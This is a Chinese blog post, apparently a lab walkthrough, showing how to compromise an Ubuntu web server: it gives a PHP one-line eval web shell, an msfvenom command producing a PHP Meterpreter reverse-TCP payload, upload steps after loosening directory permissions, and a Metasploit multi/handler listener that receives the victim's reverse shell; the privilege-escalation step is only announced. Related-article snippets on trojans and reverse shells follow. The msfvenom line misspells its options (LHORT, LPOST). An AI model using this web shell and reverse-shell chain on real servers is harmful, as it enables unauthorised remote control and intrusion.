MSF回弹木马ubuntu测试

已于 2024-08-02 21:33:11 修改
阅读量519 收藏 4
点赞数 14
分类专栏: 渗透小测试 文章标签: android
于 2024-08-02 20:11:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Thewei666/article/details/140877216
版权

网站地址为192.168.104.128

web.php内容为:

<?php 
	eval($_POST[123]);
?>

linux版本信息:20.04.1-Ubuntu

nginx信息:nginx-1.21.6

php信息:PHP 7.3.33-19

php-fpm信息:/etc/php/7.3/fpm/php-fpm.conf

一、使用蚁剑连接网站

在此页面,我们可以查看当前网页的文件,但是无法访问其他页面(权限不够)

我们可以右键打开虚拟终端来查看自己的权限

二、反弹性木马

1)生成木马文件webreverse.php

msfvenom -p  php/meterpreter/reverse_tcp  LHORT=192.168.104.128 LPOST=12345 -f php -o shellreverse.php

其内容为:

2)上传webreverse.php至网站

可以使用命令来传递文件

python3 -m http.server 999

在蚁剑中,我们选择右键上传文件,但是因为权限问题,会导致文件上传失败。所以可以选择降低目录权限或提高自己的权限

降低目录的权限:

此时上传webreverse文件

因为该php文件是一个反弹型木马,受害者会连接攻击者,所以需要我们去监听

3)监听端口

msfconsole  
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.104.131
set lport 12345
exploit

访问192.168.104.128的shellreverse.php时,这台受害主机就会连接到我们的攻击主机中

4)提权

此时我们的权限是比较低,所以需要在此进行提权

魏大橙
关注
  • 14
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
使用Msfvenom生成Ubuntu 64位木马(反向连接、正向连接)
zhang35的博客
04-20 1万+
环境 攻击机:Kali Linux 2020.1 172.16.252.129 靶机:Ubuntu 16.04 172.16.252.138 生成木马 使用kali自带的Msfvenom工具生成木马。 查看有哪些linux下的载荷: msfvenom -l payloads | grep linux 针对Ubuntu 64位靶机,使用linux/x64/meterpreter/reverse_t...
MSF生成木马木马的简单使用
爱喝水的仙人树的博客
11-03 9097
本文将介绍有关MSF木马模块的简单使用方式,介绍常见的几种木马生成方式,如有不对的地方,欢迎大家在评论区指正。由于本文仅对部分模块的简单使用进行说明,更多信息请参考官方网址MSFVENOM环境配置说明1. 使用kali虚拟机和Win7(可以低于此版本)虚拟机2. kali虚拟机建议使用最新版本并将系统软件更新至最新版本3. Win7虚拟机务必关闭网络防火墙,不建议使用Win7及以上版本系统,简单的木马会被直接删除4. 查看两台虚拟机的IP地址,确保两台虚拟机之间可以ping通。
Metasploit(msf)系列-木马生成
热门推荐
chaojixiaojingang
09-28 3万+
原理: 利用msf模块中的msfvenom模块,首先生成.exe木马文件,用靶机打开,攻击成功后,就渗透到了靶机系统中。 msfvenom命令行选项如下: Options:     -p, --payload    &lt;payload&gt;       指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用&amp;#039;-&amp;#039;或者s...
MSF回弹木马Ubuntu测试
weixin_63264424的博客
08-06 322
注意:在蚁剑中,我们选择右键上传文件,但是因为权限问题,会导致文件上传失败。所以可以选择降低目录权限或提高自己的权限。访问192.168.30128的shellreverse.php时,这台受害主机就会连接到我们的攻击主机中。搭建网络环境用到python3 -m http.server命令目的方便到网站下载该木马。此时我们的权限是比较低,所以需要在此进行提权。在此页面我们可以查看当前文件,但是无法查看其它页面(权限不够)什么都不显示说明这个没有问题就怕访问失败。我们可以打开蚂键的虚拟终端产查看我们的权限。
MSF回弹木马测试
m0_64802817的博客
08-06 322
MSF回弹木马windows测试过程截图。MSF回弹木马ubuntu测试过程截图。
msf和Cobalt Strike工具的应用(远程控制木马的工具)
m0_71483678的博客
08-11 1169
msf和cs的使用
vulntarget漏洞靶场-vulntarget-b
aming小老弟
07-19 3740
vuln靶场
【甄选靶场】Vulnhub百个项目渗透——项目十三:SickOs 1.2(防火墙绕过,计划任务写入)
人间体佐菲的博客
09-15 1062
web安全,网络安全,渗透测试,信息安全,网络空间安全
常见的反弹shell的方法以及对反弹shell的解释
qq_45584159的博客
03-04 1万+
文章目录一.什么是反弹shell,以及对反弹shell作用原理的解析:3.反弹shell的本质linux文件描述符重定向输入重定向输出重定向标准输出与标准错误输出重定向文件描述符的复制exec 绑定重定向对反弹shell执行的实例分析:>&、&>常见linux提权 一.什么是反弹shell,以及对反弹shell作用原理的解析: 1.定义 通俗来说,shell就是实现用户命令的接口,通过该接口我们能实现对计算机的控制(root权限), 而反弹shell就是将shell反弹给攻击
msf使用木马控制android手机
my_name_is_sy的博客
05-18 2412
使用msfvenom生成木马控制手机
msf生成php木马,11.7 Weevely3生成网页木马、Backcookie后门生成工具、使用msf生成木马、一句话变形技巧和使用...
weixin_36005427的博客
03-27 1934
大马:代码量大,体积大,可以和一句话木马配合使用(先传一句话后传大马),一般同意被发现,可变形或伪装(编码、远程接入),主要功能:文件管理、,命令执行、数据库管理、清理木马、屑木马、收集信息、提权等。Webshell管理工具的介绍和使用:Webshell工具主要和一句话配合使用中国菜刀、中国蚁剑等Weevely3生成网页木马(基于python)python weevely.py -h python...
2024年网络安全最新【网络安全】 MSF生成木马教程
2401_84281712的博客
05-03 305
这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新**2、查看权限,当客户机是普通用户登录的话,此时获取到的就是一个普通 user 权限。1、当出现 meterpreter,表示成功入侵。2、设置Payload。
MSF生成木马渗透WIN7
妖魔鬼怪快离开的博客
11-15 5430
生成木马 使用msf模块中的msfvenom模块,生成.exe木马文件 msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击主机IP地址 LPORT=4444 -f exe > /home/tim/桌面/qq.exe 启动msfconsole msfconsole 设置payload参数 //开启监听· use exploit/multi/handler //设置tcp监听 set payload windows/meterpreter/rev
高德地图SDK Android版开发 10 InfoWindow
程序喵D的博客
09-06 1875
前文介绍高德地图添加Marker覆盖物的使用方法,Marker结合InfoWindow可展示更详尽的信息。本文将介绍以下内容:1. 使用SDK默认样式显示InfoWindow的方法;2. 自定义InfoWindow样式的方法。
攻防世界 Web_php_unserialize
最新发布
beiweixiaotian66的博客
09-07 469
因为GET传参还要经过一个Base64的解码,所以对这个表达式还要经过base64的加密。因为前面还有个正则表达式,所以我们还需要绕过这个正则表达式,使用。然后我们知道怎么绕过了,可不可以直接自己手动绕过,base加密捏。如果表示对象属性个数的值大于真实的属性个数时,就可以绕过。代表着后面的变量名长度应是10,但好像只有八位?表示空字符,但是还是占用一个字符位置。但是这样的base和上面不一样。,这样base出来就是一样的了。方法,写一个反序列化的脚本。这道题我们需要的文件是。,所以我们主要需要绕过。
安卓model转鸿蒙ets
琼小资的专栏
09-03 407
现在的android studio提供了java自动转kotlin的实现,非常方便。那android的java和kotlin有没有可能转成鸿蒙artts呢。先从最简单的model转换开始,把kotlin的model转成ets。本质上都是字符串文件,讲道理应该是可行的。
RK3566/RK3568 Android 11 动态禁止/启用APP
qq_23921815的博客
09-04 369
RK3566/RK3568 Android 11 定制大全在系统服务中增加动态禁止/启用应用。
Kali Linux MSF渗透测试实战教程
"kali linux msf系列视频教程涵盖了从虚拟机使用到高级渗透测试技术的多个方面,包括MSF基础、漏洞利用、提权、爆破、木马生成与免杀以及持续控制等关键概念。" Kali Linux是一款基于Debian的Linux发行版,专门用于...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

魏大橙

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值